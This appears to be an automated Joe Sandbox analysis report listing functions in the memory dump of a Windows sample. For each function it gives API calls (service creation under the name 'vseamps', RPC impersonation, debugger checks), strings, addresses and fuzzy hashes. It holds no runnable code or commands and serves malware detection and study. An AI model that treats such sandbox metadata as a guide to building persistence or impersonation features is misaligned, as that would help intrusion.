Function 000000014000C3F0 Relevance: 29.0, APIs: 19, Instructions: 515COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00

Function 0000000140001520 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 95COMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32 ref: 00000001400015A4
GetLastError.KERNEL32 ref: 00000001400015B2

Part of subcall function 0000000140001430: GetModuleFileNameW.KERNEL32 ref: 000000014000145E
Part of subcall function 0000000140001430: OpenSCManagerW.ADVAPI32 ref: 000000014000146C
Part of subcall function 0000000140001430: GetLastError.KERNEL32 ref: 000000014000147A

Strings

/remove, xrefs: 000000014000157E
vseamps, xrefs: 0000000140001538
/service, xrefs: 000000014000153F

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: ErrorLastManagerOpen$FileModuleName
String ID: /remove$/service$vseamps
API String ID: 67513587-3839141145
Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704

Function 000000014000F000 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
GetProcAddress.KERNEL32 ref: 000000014000F0F3
GetProcAddress.KERNEL32 ref: 000000014000F117

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

Strings

GetLastActivePopup, xrefs: 000000014000F094
GetActiveWindow, xrefs: 000000014000F075
USER32.DLL, xrefs: 000000014000F03B
GetProcessWindowStation, xrefs: 000000014000F10D
MessageBoxA, xrefs: 000000014000F054
GetUserObjectInformationA, xrefs: 000000014000F0E9

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: AddressProc$Load$Library
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 3981747205-232180764
Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210

Function 00000001400022C0 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140002315
CreateEventW.KERNEL32 ref: 0000000140002326
CreateEventW.KERNEL32 ref: 0000000140002340
CreateEventW.KERNEL32 ref: 000000014000235E
RpcImpersonateClient.RPCRT4 ref: 0000000140002372
GetCurrentThread.KERNEL32 ref: 0000000140002390
OpenThreadToken.ADVAPI32 ref: 00000001400023A7
RpcRevertToSelfEx.RPCRT4 ref: 0000000140002402

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
String ID:
API String ID: 4284112124-0
Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40

Function 0000000140001430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52serviceCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 000000014000145E
OpenSCManagerW.ADVAPI32 ref: 000000014000146C
GetLastError.KERNEL32 ref: 000000014000147A
CreateServiceW.ADVAPI32 ref: 00000001400014D4
CloseServiceHandle.ADVAPI32 ref: 00000001400014E2
CloseServiceHandle.ADVAPI32 ref: 00000001400014F5

Strings

vseamps, xrefs: 00000001400014AD, 00000001400014B4

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
String ID: vseamps
API String ID: 3693165506-3944098904
Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00

Function 0000000140009300 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF

Strings

Microsoft Visual C++ Runtime Library, xrefs: 00000001400094B4
..., xrefs: 0000000140009431
<program name unknown>, xrefs: 00000001400093D9
Runtime Error!Program: , xrefs: 000000014000938D

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304

Function 000000014000BB70 Relevance: 12.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000BBDC
GetLastError.KERNEL32 ref: 000000014000BBEC
LCMapStringW.KERNEL32 ref: 000000014000BC5F
WideCharToMultiByte.KERNEL32 ref: 000000014000BCC8
WideCharToMultiByte.KERNEL32 ref: 000000014000BD80
LCMapStringA.KERNEL32 ref: 000000014000BDA3

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

LCMapStringA.KERNEL32 ref: 000000014000BE48
MultiByteToWideChar.KERNEL32 ref: 000000014000BEC8

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: String$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 2057259594-0
Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700

Function 0000000140005A70 Relevance: 12.2, APIs: 8, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32 ref: 0000000140005A8B
GetProcessHeap.KERNEL32 ref: 0000000140005A92
HeapAlloc.KERNEL32 ref: 0000000140005AA3
GetVersionExA.KERNEL32 ref: 0000000140005AE6
GetProcessHeap.KERNEL32 ref: 0000000140005AF0
HeapFree.KERNEL32 ref: 0000000140005AFE
GetProcessHeap.KERNEL32 ref: 0000000140005B22
HeapFree.KERNEL32 ref: 0000000140005B30

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: Heap$Process$Free$AllocInfoStartupVersion
String ID:
API String ID: 3103264659-0
Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741

Function 00007FFDA55D2630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFDA55D264C
RtlCaptureContext.KERNEL32 ref: 00007FFDA55D2679
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFDA55D2693
RtlVirtualUnwind.KERNEL32 ref: 00007FFDA55D26D4
IsDebuggerPresent.KERNEL32 ref: 00007FFDA55D2728
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFDA55D2745
UnhandledExceptionFilter.KERNEL32 ref: 00007FFDA55D2750

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction ID: 097cef425e031b2cf63e4e9710d8852a71e9e99c99783e19c64c147e49a65aad
Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction Fuzzy Hash: EE316B7770AB8586EB61CF60E8503ED2361FB85B44F40403AEA4E43B99DF78D658C714

Function 0000000140007C91 Relevance: 9.1, APIs: 6, Instructions: 137COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 0000000140007D66
IsDebuggerPresent.KERNEL32 ref: 0000000140007DAA
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140007DB4
UnhandledExceptionFilter.KERNEL32 ref: 0000000140007DBF
GetCurrentProcess.KERNEL32 ref: 0000000140007DD5
TerminateProcess.KERNEL32 ref: 0000000140007DE3

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
String ID:
API String ID: 1269745586-0
Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00

Function 00007FFDA55D76E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFDA55D7759
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFDA55D7771
RtlVirtualUnwind.KERNEL32 ref: 00007FFDA55D77AC
IsDebuggerPresent.KERNEL32 ref: 00007FFDA55D77E5
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFDA55D77EF
UnhandledExceptionFilter.KERNEL32 ref: 00007FFDA55D77FA

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction ID: 7a0aa3a64aedfe5fdd18d5de485b6e4c9fd5a0e2d53438ce7b3bfbd120847e72
Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction Fuzzy Hash: F6316C3B71AB8586DB61CF24E8503AE23A0FB89B54F500535EE9E43B9ADF38D155CB04

Function 000000014000A370 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000014000A3AF
GetCurrentProcessId.KERNEL32 ref: 000000014000A3BA
GetCurrentThreadId.KERNEL32 ref: 000000014000A3C6
GetTickCount.KERNEL32 ref: 000000014000A3D2
QueryPerformanceCounter.KERNEL32 ref: 000000014000A3E3

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700

Function 0000000140004630 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704

Function 00000001400106B0 Relevance: 4.5, APIs: 3, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00000001400106EF
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140010735
UnhandledExceptionFilter.KERNEL32 ref: 0000000140010740

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContext
String ID:
API String ID: 2202868296-0
Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01

Function 00007FFDA55E0248 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FFDA55E0497
RaiseException.KERNEL32 ref: 00007FFDA55E04A8

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
Instruction ID: c66764f6263f35c6a3b7e0fdb531f2641308f8258d3620ff50d65addd93e9296
Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
Instruction Fuzzy Hash: C4B14877601B898BEB16CF29C89636C3BE0F745F48F148926DA5D837A5CB39D862C704

Function 00000001400103D0 Relevance: 3.2, APIs: 2, Instructions: 183COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00000001400105C2
GetLastError.KERNEL32 ref: 00000001400105ED

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10

Function 0000000140010CF0 Relevance: 3.1, APIs: 2, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300

Function 00007FFDA55DA1B8 Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
Instruction ID: c02958a75eb18f2719bf1c8b23a7730fcf958ab4ee8887cee809f16585b8f490
Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
